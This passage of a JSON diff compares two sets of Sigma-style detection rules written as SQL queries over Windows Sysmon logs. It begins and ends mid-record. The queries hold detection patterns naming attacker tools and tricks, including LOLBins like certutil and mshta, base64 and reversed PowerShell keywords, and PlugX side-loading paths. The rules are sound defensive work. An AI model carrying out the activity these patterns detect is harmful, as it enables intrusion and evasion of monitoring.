ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_lolbin_findstr.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Non Interactive PowerShell Process Spawned", + "id": "f4bbd493-b796-416e-bbf2-121235348529", + "status": "test", + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with a non user process such as \"explorer.exe\" as a parent.", + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "System administrator usage" + "Legitimate programs executing PowerShell scripts" ], - 
"level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND NOT (((ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\') OR ParentImage LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% --ms-enable-electron-run-as-node %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_powershell_non_interactive_execution.yml" }, { - "title": "Suspicious SysAidServer Child", - "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", "status": "experimental", - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": 
"Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine 
LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Suspicious Copy From or To System32", - "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", "status": "test", - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1574.002" ], "falsepositives": [ - "Depend on scripts and administrative tools 
used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image 
LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_susp_copy_system32.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Child Process Created as System", - "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "status": "test", - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "title": "Hardware Model Reconnaissance Via Wmic.EXE", + "id": 
"3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "status": "experimental", + "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_child_process_as_system_.yml" + "filename": "proc_creation_win_wmic_recon_csproduct.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE 
'%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", - "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "title": "Execute Code with Pester.bat as Parent", + "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "status": "experimental", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], 
"falsepositives": [ - "Administrative activity", - "Software installation" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_lolbin_pester.yml" }, { - "title": "Suspicious ScreenSave Change by Reg.exe", - "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", - "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "status": "test", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "GPO" + "Various applications", + "Tools that include ping or nslookup command invocations" ], 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_screensaver.yml" + "filename": "proc_creation_win_susp_execution_path_webserver.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "status": "test", - "description": "Detects potential process and execution activity 
related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' 
ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.defense_evasion" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' 